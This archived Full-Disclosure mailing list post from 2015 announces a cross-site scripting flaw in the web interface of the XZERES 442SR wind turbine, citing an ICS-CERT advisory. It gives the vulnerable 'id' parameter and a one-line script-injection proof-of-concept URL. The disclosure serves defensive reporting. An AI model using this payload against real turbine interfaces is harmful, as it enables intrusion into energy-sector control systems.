| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAB8+WF3eM=M2hTowMB=p2mRoGe0qGTatgG2u99ZWsPOmj20yBg@mail.gmail.com> Date: Thu, 24 Dec 2015 18:05:36 +0000 From: Karn Ganeshen <karnganeshen@...il.com> To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org> Subject: [FD] XZERES 442SR Wind Turbine XSS XZERES 442SR Wind Turbine Cross-site Scripting Vulnerability *AFFECTED PRODUCTS* XZERES is a US-based energy company that maintains offices in several countries around the world, including the UK, Italy, Japan, Vietnam, Philippines, and Myanmar. The affected product, 442SR Wind Turbine, has a web-based interface system. According to XZERES, the 442SR is deployed across the Energy sector. XZERES estimates that this product is used worldwide. *Reference* https://ics-cert.us-cert.gov/advisories/ICSA-15-342-01 *Vulnerable parameter* id *PoC* http://<IP>/details?object=Inverter&id=2<script>alert(xss-id-parameter") </script> -- Best Regards, Karn Ganeshen _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists